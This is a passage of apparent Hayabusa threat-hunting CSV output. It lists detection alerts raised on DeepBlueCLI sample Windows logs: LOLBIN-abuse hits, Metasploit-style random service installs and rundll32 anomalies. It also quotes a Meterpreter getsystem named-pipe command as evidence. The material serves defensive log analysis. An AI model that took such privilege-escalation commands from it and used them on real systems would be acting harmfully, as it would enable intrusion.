0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:30.037 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160818195530.log C:\Windows\Logs\CBS\CbsPersist_20160818195530.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:33.000 +00:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 19:55:49.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 19:55:49.421 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:49.421 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:49.531 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:49.531 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:49.562 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:49.562 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:49.734 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:49.734 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:49.750 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:49.750 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:49.765 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:49.765 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:50.703 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:50.703 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:51.578 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:51.578 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:51.989 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x71c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:52.176 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:52.208 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:52.208 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:52.364 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:52.801 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:53.255 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xbc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:57.149 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xa5c | User: IEUser | LID: 0x1ceaf",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:57.542 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xa7c | User: IEUser | LID: 0x1ceaf,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:57.542 +00:00,IE10Win7,4688,medium,Exec | Evas,False Sysinternals Suite Tools,,rules/sigma/process_creation_builtin/proc_creation_win_false_sysinternalsuite.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:59.915 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb1c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:56:00.621 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:56:00.621 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:56:02.589 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:56:34.967 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:56:34.999 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdd0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:58:48.497 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:58:48.512 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{A4B07E49-6567-4FB8-8D39-01920E3B2357} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd14 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:58:53.028 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:58:53.028 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:59:33.224 +00:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 19:59:33.224 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 19:59:33.224 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 19:59:33.255 +00:00,IE10Win7,4688,high,LatMov | Exec,Rundll32 Without Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:59:33.255 +00:00,IE10Win7,4688,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_builtin/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:59:33.255 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:00:43.879 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfc0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:00:43.910 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x674 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:00:43.941 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:03:18.175 +00:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:03:18.175 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:03:18.175 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:03:18.175 +00:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Path: C:\Windows\System32\cmd.exe | PID: 0x57c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:03:18.175 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Path: C:\Windows\System32\cmd.exe | PID: 0x57c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:03:18.175 +00:00,IE10Win7,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:03:51.191 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:04:19.379 +00:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:04:19.379 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:04:19.379 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:04:19.394 +00:00,IE10Win7,4688,high,LatMov | Exec,Rundll32 Without Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:04:19.394 +00:00,IE10Win7,4688,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_builtin/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:04:19.394 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:08:53.832 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x274 | User: IEUser | LID: 0x1d069",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:08:53.832 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:08:59.785 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:10:06.597 +00:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:10:06.597 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:10:06.597 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:10:06.629 +00:00,IE10Win7,4688,high,LatMov | Exec,Rundll32 Without Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:10:06.629 +00:00,IE10Win7,4688,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_builtin/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:10:06.629 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:11:24.391 +00:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:11:24.391 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:11:24.391 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:11:24.407 +00:00,IE10Win7,4688,high,LatMov | Exec,Rundll32 Without Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:11:24.407 +00:00,IE10Win7,4688,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_builtin/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:11:24.407 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:11:24.907 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:11:24.907 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:12:53.344 +00:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:12:53.344 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:12:53.344 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:12:53.376 +00:00,IE10Win7,4688,high,LatMov | Exec,Rundll32 Without Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:12:53.376 +00:00,IE10Win7,4688,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_builtin/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:12:53.376 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:14:12.922 +00:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:14:12.922 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:14:12.922 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:14:12.954 +00:00,IE10Win7,4688,high,LatMov | Exec,Rundll32 Without Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:14:12.954 +00:00,IE10Win7,4688,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_builtin/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:14:12.954 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:16:40.574 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc94 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:16:40.574 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x754 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:16:40.605 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xad4 | User: IEUser | LID: 